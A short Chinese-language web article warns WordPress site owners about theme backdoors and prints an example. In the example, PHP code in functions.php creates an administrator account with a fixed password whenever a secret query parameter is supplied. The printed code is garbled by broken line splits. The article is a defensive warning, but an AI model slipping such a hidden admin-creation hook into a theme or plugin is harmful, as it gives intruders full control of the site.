防范wordpress主题加后门代码获取管理员权限-知识分享-234导航

防范wordpress主题加后门代码获取管理员权限详细介绍

只需几行代码就可以为WordPress主题留下后门，大家要小心了

代码如下:

add_action( '_head', 'my_backdoor' );

functio
n my_back
doo
http://r() {

if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e5
14b8576fab1a75a89a6b' ) {

require( 'wp-includes/registration.' );

if ( !username_exists( 'backdoor' ) ) {

$user_id = wp_create_user( 'backdoor', 'pa55w0rd!' );

$user = new WP_User( $user_id );

$user->set_role( 'administrator' );

}

}

}

简单说明下，代码主要放于functions.php文件里面，不会影响任何功能使用，如果存在此代码，任何人只要运行http://www.你的域名.com/?backdoor=go，然后就创建了一个用户名为“backdoor”，密码为：“pa55w0rd!” 的管理员。同样具备管理员的权限，很编辑主题代码文件，相信此时你一定感觉到很危险了吧，赶紧检查检查自己的主题代码吧……

本文标题: 防范wordpress主题加后门代码获取管理员权限 ,

← 上一篇: wordpress自带的缓存功能使用介绍下一篇: wordpress从顶部开始裁剪图片的方法→

知识分享相关文章：

更多知识分享 >

网站数据信息

"防范wordpress主题加后门代码获取管理员权限"浏览人数已经达到51次，如你需要查询该站的相关权重信息，可以点击进入"Chinaz数据" 查询。更多网站价值评估因素如：防范wordpress主题加后门代码获取管理员权限的访问速度、搜索引擎收录以及索引量、用户体验等。要评估一个站的价值，最主要还是需要根据您自身的需求，如网站IP、PV、跳出率等！